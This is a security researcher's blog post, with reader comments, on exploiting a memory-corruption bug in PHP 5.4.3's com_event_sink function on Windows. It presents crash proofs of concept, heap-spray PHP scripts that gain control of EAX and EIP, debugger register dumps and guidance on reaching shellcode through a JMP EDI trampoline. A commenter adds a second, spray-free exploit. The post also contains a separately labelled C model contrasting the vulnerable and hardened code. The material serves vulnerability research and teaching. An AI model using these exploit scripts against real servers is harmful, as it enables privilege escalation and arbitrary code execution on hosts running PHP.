
Fb1h2s aka Rahul Sasi's Blog

Web-App Remote Code Execution Via Scripting Engines Part -1: Local Exploits PHP 0-day

Posted 08-20-2012 at 07:07 PM

This is part 1 of my C0C0n talk, where I demonstrated a few PHP 0-days, local and remote. The entire concept of the talk was demonstrating attacks on web applications via scripting engines.

In a common web-app test we manipulate input that an ordinary end user controls and check the application's responses. But that data is processed by the PHP or ASP engines the apps are built on, so we were fuzzing those engines and trying to find issues in them that an ordinary user could attack. My talk had two parts, local attacks and remote attacks. In the local attacks I demonstrated ways to do privilege escalation by exploiting PHP, and in the remote attacks we mapped PHP functions that take arguments from remote users, like file-processing and image-processing functions, and demonstrated ways to exploit them. The entire presentation concentrated on PHP core bugs.


The current post is on the PHP local attacks only [the first part of the talk]; since one of these issues is already out, it's time to blog.

I will put down some intro on PHP architecture, the history of PHP local attacks and the exploits commonly used in the wild for privilege escalation, followed by my own 0-days [the way I delivered my talk].



Note: The images put up here were not created by me; at the time of making the PPTs I downloaded them via Google Images, and now I have no clue whom to credit.


Web Application: How Stuff Works.

1) User [browser] sends input to the web app.
2) The HTTP server catches it and
3) passes it to the web app.
4) The web app sends it to the scripting engine to process it.


[Image: WebbAppArticeture.jpg]

PHP Architecture:

These diagrams explain the PHP architecture well enough that I won't describe it in detail.

[Image: phpartic.jpg]

PHP + Apache Security Architecture:

1) So if you could execute code in the context of PHP, you would be able to break out of many restrictions.
2) You should be able to get shell access to hardened PHP hosts.
3) Shared-hosting Windows servers are affected the most.
4) These sorts of bugs are rated 10/10 in CVE score by PHP.

[Image: phppace.jpg]

Why PHP Local Exploits?

1) For Privilege Escalation
2) Code Execution in Protected Environments
3) Bypassing Security Restrictions

History of PHP Local Exploits for Bug Hunters:

1) PHP Symlink Exploit
2) PHP Nginx Exploit
3) _php_stream_scandir
4) CVE-2011-3268 [crypt function]
5) PHP XSLT Injection
http://xhe.myxwiki.org/xwiki/bin/vie...plication_PHP5

The best PHP bug hunts were done by i0n1c and team for their "Month of PHP Security" in 2007 and 2010. About 60 security issues were identified and a few POCs were released.

Or you could browse this well-organized archive: PHP: Products and vulnerabilities.

In April 2012 I found a few local security issues that were added to the CoCon CFP, which were later identified independently by condis: PHP <= 5.4.3 (com_event_sink) Code Execution Proof of Concept - CXSecurity WLB. Now that this issue is public, I will put down my analysis notes on getting code execution on this bug. The current bug only affects PHP on Windows.

PHP 5.4.3 com_event_sink 0-day:


The Vulnerable Function:

PHP provides a module to interact with COM and .NET (Windows). In it, com_event_sink is used the following way.

It allows users to call a COM instance, in the current case [IE], and interact with it.
Note: This feature is handy if the server you have access to has disallowed other mechanisms to download files to it, like .

The following code will open an IE instance and download the Google web page. The function com_event_sink takes three arguments:

1) --> $ie = new COM("InternetExplorer.Application");

   The COM object to be interacted with (its address)

2) --> Sink object

3) --> Sink interface

com_event_sink($ie, $sink, "DWebBrowserEvents2");

PHP Code:
<?php
class IEEventSinker {
    var $terminated = false;

    function ProgressChange($progress, $progressmax) {
        echo "Download progress: $progress / $progressmax\n";
    }

    function DocumentComplete(&$dom, $url) {
        echo "Document $url complete\n";
    }

    function OnQuit() {
        echo "Quit!\n";
        $this->terminated = true;
    }
}
$ie = new COM("InternetExplorer.Application");
// note that you don't need the & for PHP 5!
$sink = new IEEventSinker();
com_event_sink($ie, $sink, "DWebBrowserEvents2");
$ie->Visible = true;
$ie->Navigate("http://www.google.com");
while (!$sink->terminated) {
    com_message_pump(4000);
}
$ie = null;
?>
The Bug:


The first argument is the address of the COM object to load, and it's controlled by the user. No validation is done on that address; the value is used directly. [Very bad logic]
PHP Code:
$ie = new COM("InternetExplorer.Application");
// note that you don't need the & for PHP 5!
$sink = new IEEventSinker();

com_event_sink($ie, $sink, "DWebBrowserEvents2");
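The defect described above, as an added model in C (not PHP's or COM's code; the VARIANT, vtable and tag values are simplified stand-ins constructed for this example, with the tag numbers assumed from OLE's VARENUM): the vulnerable shape dereferences the payload of a tagged value as an object pointer without checking the tag, while the hardened shape refuses anything that is not a non-NULL object before the first dereference.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Type tags; numeric values follow OLE's VARENUM (assumed here, not taken from the post). */
enum { VT_EMPTY = 0, VT_I4 = 3, VT_DISPATCH = 9 };

/* Simplified VARIANT: a tag plus a payload whose members share storage, so an
 * integer set through lVal is also what pdispVal reads back. */
typedef struct Variant {
    unsigned short vt;
    union {
        int32_t lVal;      /* VT_I4: an integer the caller chose */
        void   *pdispVal;  /* VT_DISPATCH: pointer to a COM object */
    } u;
} Variant;

/* COM-style object: first word is the vtable pointer. On 32-bit, slot 4 sits
 * at offset 0x10, i.e. the target of "call dword ptr [eax+10h]" in the crash. */
typedef struct Obj Obj;
typedef struct Vtbl {
    int (*slot0)(Obj *); int (*slot1)(Obj *); int (*slot2)(Obj *); int (*slot3)(Obj *);
    int (*advise)(Obj *);
} Vtbl;
struct Obj { const Vtbl *vtbl; int id; };

#define ERR_NOT_OBJECT (-1)

/* Vulnerable shape: the payload is used as an object pointer with no tag check.
 * With vt == VT_I4 and lVal == 0x43434343 the read of o->vtbl below is the
 * faulting "mov eax,dword ptr [esi]" from the post. */
int sink_vulnerable(const Variant *v) {
    Obj *o = (Obj *)v->u.pdispVal;
    return o->vtbl->advise(o);            /* o->vtbl = [esi]; ->advise = [eax+10h] */
}

/* Hardened shape: only a non-NULL object-tagged value reaches a dereference,
 * and a broken vtable is rejected before the indirect call. */
int sink_hardened(const Variant *v) {
    if (v == NULL || v->vt != VT_DISPATCH || v->u.pdispVal == NULL)
        return ERR_NOT_OBJECT;
    Obj *o = (Obj *)v->u.pdispVal;
    if (o->vtbl == NULL || o->vtbl->advise == NULL)
        return ERR_NOT_OBJECT;
    return o->vtbl->advise(o);
}

/* A legitimate object and the two ways a Variant can be built. */
static int demo_advise(Obj *o) { return 1000 + o->id; }
static const Vtbl demo_vtbl = { NULL, NULL, NULL, NULL, demo_advise };
Variant make_object_variant(Obj *o) { Variant v; v.vt = VT_DISPATCH; v.u.pdispVal = o; return v; }
Variant make_int_variant(int32_t val) { Variant v; v.vt = VT_I4; v.u.pdispVal = NULL; v.u.lVal = val; return v; }

/* Returns 1 when both sinks accept a real object and the hardened one rejects
 * the crash-shaped integer (0x43434343 from the post) and a NULL object. */
int demo_checks(void) {
    Obj real = { &demo_vtbl, 7 };
    Variant ok = make_object_variant(&real), bad = make_int_variant(0x43434343), nul = make_object_variant(NULL);
    return sink_vulnerable(&ok) == 1007 && sink_hardened(&ok) == 1007
        && sink_hardened(&bad) == ERR_NOT_OBJECT && sink_hardened(&nul) == ERR_NOT_OBJECT;
}

int main(void) { printf("checks %s\n", demo_checks() ? "pass" : "fail"); return demo_checks() ? 0 : 1; }
```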

POC

PHP Code:
<?php
$buffer = str_repeat("B", 1000);

$vVar  = new VARIANT(0x43434343); // We control this
$vVar2 = new VARIANT(0x41414141);

com_event_sink($vVar, $vVar2, $buffer);
?>
Code:
(310.1fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=00372ad0 edx=0114dd88 esi=43434343 edi=0114d9b8
eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll - 
php5ts!php_strftime+0xadc:

102f59bd 8b06            mov     eax,dword ptr [esi]  ds:0023:43434343=????????  
102f59bf 8d4dd4          lea     ecx,[ebp-2Ch]
102f59c2 51              push    ecx
102f59c3 53              push    ebx
102f59c4 53              push    ebx
102f59c5 56              push    esi
102f59c6 ff5010          call    dword ptr [eax+10h]
Cool, we control ESI fully, and the instruction crashes since the mov into EAX fails because ESI points to an invalid address:

----> mov eax,dword ptr [esi] ds:0023:43434343=????????

And EDI holds the third argument, enough to hold some shellcode.

Code:
0:000> d edi
0114d9f8  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da08  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da18  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da28  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB
0114da38  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB

Code Execution [Exploitation]:

*) We control ESI and thereby could take control of EAX.
*) If we point ESI at a valid address and fill that memory with an arbitrary address, then EAX is in our hands.
*) And at 102f59c6 call dword ptr [eax+10h] we can easily control EIP, since we control EAX and thereby could make the call land anywhere we want [voila].
*) So we need to spray with two different values: one value for controlling EAX and guiding the [CALL] instruction to a valid address space, and another to control [EIP] and get complete control over the program.

In short:

$EIP = "AAAA"; // JMP EDI
$EAX = "BBBB" - 10h;
$spray = $EIP . $EAX;


1) Do some spray to take control of EAX.
2) Make the address [Address - 10h], since it's CALL [EAX+10h].
3) So fill ESI memory with "\x34\x43\x42\x41".

PHP Code:
<?php
$spray = str_repeat("\x34\x43\x42\x41", 0x100);
// We want EAX = 41424334, so little-endian.
echo strlen($spray);

$deodrant = "";
for ($i = 0; $i < 0x4b00; $i++) {
    $deodrant .= $spray;
}

$terminate = "T";

$u[] = $deodrant;

$r[] = $deodrant . $terminate;
$a[] = $deodrant . $terminate;
$s[] = $deodrant . $terminate;

$vVar = new VARIANT(0x048d0000 + 180);   // We control this
//$buffer = str_repeat("B",200);
$buffer = "\x41\x42\x43\x44\x90\x90\x90\x90\xcc\xcc\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
$var2 = new VARIANT(0x41414242);

com_event_sink($vVar, $var2, $buffer);
?>
Code:
(1fc.b7c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41424334 ebx=00000000 ecx=00c1f9b0 edx=0114dbf0 esi=048d00b4 edi=0114dc48
eip=102f59c6 esp=00c1f978 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll - 
php5ts!php_strftime+0xae5:

102f59c2 51              push    ecx
102f59c3 53              push    ebx
102f59c4 53              push    ebx
102f59c5 56              push    esi
102f59c6 ff5010          call    dword ptr [eax+10h]  ds:0023:41424344=????????
Now spray with two different values: one for controlling EAX and guiding the [CALL] instruction to a valid address space, and another to control [EIP] and get complete control over the program.


PHP Code:
<?php
$eip = "\x44\x43\x42\x41";
//$eip = "\x4b\xe8\x57\x78"; // jmp edi
$eax = "\x80\x01\x8d\x04";
$deodrant = "";
$axespray = str_repeat($eip . $eax, 0x80);

//048d0190
echo strlen($axespray);

//19200 == 4B32 4b00
for ($axeeffect = 0; $axeeffect < 0x4B32; $axeeffect++) {
    $deodrant .= $axespray;
}

$terminate = "T";

$u[] = $deodrant;

$r[] = $deodrant . $terminate;
$a[] = $deodrant . $terminate;
$s[] = $deodrant . $terminate;

$vVar = new VARIANT(0x048d0000 + 180);
$buffer = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
$var2 = new VARIANT(0x41414242);

com_event_sink($vVar, $var2, $buffer);
?>
And voila, EIP = "woot woot"

Code:
(cb0.7d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=048d0180 ebx=00000000 ecx=00c1f9b0 edx=0114dbc8 esi=048d00b4 edi=0114dc20
eip=41414141 esp=00c1f974 ebp=00c1f9dc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
41414141 ??              ???
Now you know it's pretty easy; you know where the shellcode is, and things are pretty obvious.

> !load byakugan
> !jutsu searchOpcode jmp edi

Code with a simple "Message Box" shellcode from our friend Atul:

[Image: phpexp.JPG]

The next part of the blog will be on the remote PHP exploits; it might have to wait a long time until things get patched up.

I have built a fully functional exploit with DEP bypass; I am not putting it here [even though it's pretty obvious from this post how to build it]. But whoever wants to play with it for learning purposes, I could share it.

Rashid Bhat has produced a reliable exploit for this bug for all Windows platforms.

http://www.garage4hackers.com/blogs/...windows-7-578/

Comments

  1. 41.w4r10r:
    waiting for RCE blog....
    anyways you can PM me the RCE sploit :P
  2. [s]:
    Hi, it looks like a good one.
    In my case it is getting DDoSed! The application gets crashed. In my system the stack is starting from 0x021F2351, and I tried to put some garbage on the stack so that ECX can be 0x41414141.
    Code:
    $EAX   = 0x021F2351;
    $stack = str_repeat("\x41", 0x1000000);
    class w00t { }
    com_event_sink(new VARIANT($EAX), new w00t(), array());
    For remote I think this will work!
    Code:
    $ie->Visible = true;
    $ie->Navigate($_POST['anyvar']);
    while (!$sink->terminated) {
        com_message_pump(4000);
    }
    PS: Remote is not tested *
  3. fb1h2s:
    I tested it only on Win XP SP2. On others it would vary.
  4. [s]:
    Got DDoSed on the following version!

    PHP 5.3.8 + Windows XP SP3 Professional PL
  5. fb1h2s:
    @[S] I haven't provided the exploit here yet, right? All you have here is the analysis. A
  6. amutu:
    Congratz for the excellent post! I'm interested in PHP internals also! Perhaps you can help me explain some stuff 'cause I'm having some problems.... I can't wait to read your PHP presentation from cocon!
    BTW, have you managed to re-create the exploit for 5.3.9? Or the RCE in 5.2? I'm working on that stuff... mostly 5.3.9.


    PS: where can I download your paper from? Can't find it on the cOcOn website.
    Updated 08-21-2012 at 05:56 PM by amutu
  7. Rashid bhatt:
    Hello

    If you are not bypassing ASLR & DEP, why do we need to spray?



    Cheers!
  8. fb1h2s:
    The PoC was made for WinXP | 2003 environments. And I don't know why you asked that question. Anyway, in the current scenario, if you check the instruction, a spray was necessary to attain code execution.

    Feel free to put up a PoC without spraying.

    Cheers.
  9. Rashid bhatt:
    @fb1h2s
    Hello brother,

    I think you got me wrong. When I said "you are not bypassing ASLR & DEP", I knew that the exploit was not meant for environments other than WinXP/2003; I thought why spraying was necessary when we can be precise with offsets.

    Anyways, here is the POC without spraying.

    And listen bro, I believe it's quite possible that this vulnerability can be turned into an address disclosure bug! We need to talk about it; contact me.

    <?php
    //$bu = str_repeat("B", 10);
    $buffer = "\x10\xD4\x10\x01" . "aaaaaaaa" . "aaaa" . "\x24\xd4\x10\x01" . "..."; // shellcode bytes omitted here (garbled in the original)



    $vVar = new VARIANT(0x0110D410); // We controll this
    $vVar2 = new VARIANT(0xbadc0de); //


    com_event_sink($vVar, $vVar2 , $buffer );
    ?>


  10. fb1h2s:
    Thanks for sharing the code and for showing interest in the work.

    But pardon me, I am not getting what you're talking about: how were you able to get code execution?

    In our case

    $vVar = new VARIANT(0x0110D410); // We control this

    is not used directly for EIP, but it's the [ dword ptr [esi] ].

    Here is the debugging output from the code you shared.

    Can you share your debugging output here please?

    Thanks again, looking forward to more fruitful discussion on this.
    Cheers.

    (ac0.ac4): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=00372ac8 edx=0114d9e0 esi=0110d410 edi=0114f230
    eip=102f59bd esp=00c1f988 ebp=00c1f9dc iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
    *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\wamp\bin\php\php5.4.3\php5ts.dll -
    php5ts!php_strftime+0xadc:
    102f59bd 8b06 mov eax,dword ptr [esi] ds:0023:0110d410=????????
    0:000> u
    php5ts!php_strftime+0xadc:
    102f59bd 8b06 mov eax,dword ptr [esi]
    102f59bf 8d4dd4 lea ecx,[ebp-2Ch]
    102f59c2 51 push ecx
    102f59c3 53 push ebx
    102f59c4 53 push ebx
    102f59c5 56 push esi
    102f59c6 ff5010 call dword ptr [eax+10h]
    102f59c9 8b45d4 mov eax,dword ptr [ebp-2Ch]

    My tests were done on:
    C:\wamp\www\phpbugs>php.exe -v
    PHP 5.4.3 (cli) (built: May 8 2012 00:51:31)
    Copyright (c) 1997-2012 The PHP Group
    Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
    with Xdebug v2.2.0, Copyright (c) 2002-2012, by Derick Rethans

    Winxp SP 3
  11. Rashid bhatt:
    Hello,

    See, this is where things go wrong:

    ============ module php5ts.dll =====================
    102F59BD 8B06 MOV EAX,DWORD PTR DS:[ESI] << we control esi VARIANT(ESI) <<
    102F59BF 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
    102F59C2 51 PUSH ECX
    102F59C3 53 PUSH EBX
    102F59C4 53 PUSH EBX
    102F59C5 56 PUSH ESI
    102F59C6 FF50 10 CALL DWORD PTR DS:[EAX+10] << this is the place we can control EIP

    Now, if we put a break-point at 0x102F59BD EDI happens to point towards $buffer variable

    EAX 00000000
    ECX 003628E8
    EDX 0110DD78
    EBX 00000000
    ESP 00C1F9F8
    EBP 00C1FA4C
    ESI 0110D410 << this is what we can control using VARIANT
    EDI 0110D410 <<< $buffer

    EIP 102F59BD php5ts.102F59BD
    C 0 ES 0023 32bit 0(FFFFFFFF)
    P 1 CS 001B 32bit 0(FFFFFFFF)
    A 0 SS 0023 32bit 0(FFFFFFFF)
    Z 1 DS 0023 32bit 0(FFFFFFFF)
    S 0 FS 0038 32bit 7FFDE000(FFF)
    T 0 GS 0000 NULL
    D 0
    O 0 LastErr ERROR_SUCCESS (00000000)
    EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)
    ST0 empty 1.#QNAN00000000000000



    $vVar = new VARIANT(0x0110D410); << (this address might vary on your system) make it the same as EDI

    Now I have aligned the buffer in such a way that it will contain data in the following fashion:

    $buffer = "buffer_base" . "JUNK 12 BYTES" . "buffer_base + 10(hex)" . "SHELLCODE";

    Here at MOV EAX,DWORD PTR DS:[ESI], as we control ESI we can load EAX with the base address of $buffer, because [$buffer] = base_addr_base.


    Later it happens to call a function at offset +10 of [eax], which in our buffer alignment points towards the shellcode...

    PS: Because the author of this exploit has already assumed that DEP/ASLR are turned off by default on the testing machine, this exploit is not likely going to work on systems running such protections.

    Thanks!
  12. fb1h2s:
    Hi bro, that was helpful; thanks for letting me know there is an alternate way to solve this.
    When I started, my aim was to make the code work on Win XP and 2003 [the majority of PHP servers] {irrespective of service packs, obviously}, and when I first looked at the crash the first thought was to use a heap spray to achieve this. Maybe because of the style I follow, so that you don't need to hardcode any address, making it reliable.

    The major issue with your method is that you need to know the exact address of the following:
    1) edi
    2) the buffer's base address

    and these two would vary even across service packs?
    Correct me if I am wrong or if you are able to solve that some way; let's keep this healthy discussion up.
  13. Rashid bhatt:
    Hello brother

    We only need to know the buffer base address; edi is not required because edi by default points towards the buffer. Moreover, the kind of spray you are doing is not effective: in the case of this exploit the heap has to be sprayed at 4-byte boundaries, and at the same time we don't know if our $buffer will be aligned at an odd or even byte boundary.

    Also, when you use a JMP EDI trampoline, your heap spray will definitely contain instructions which might have bad side effects! Anyways... let's work together on converting this exploit into an address disclosure bug!

    Cheers!
  14. fb1h2s:
    Well, in that case let's be productive: we will pick some other bug which is not public and try to make an exploit out of it, what say?
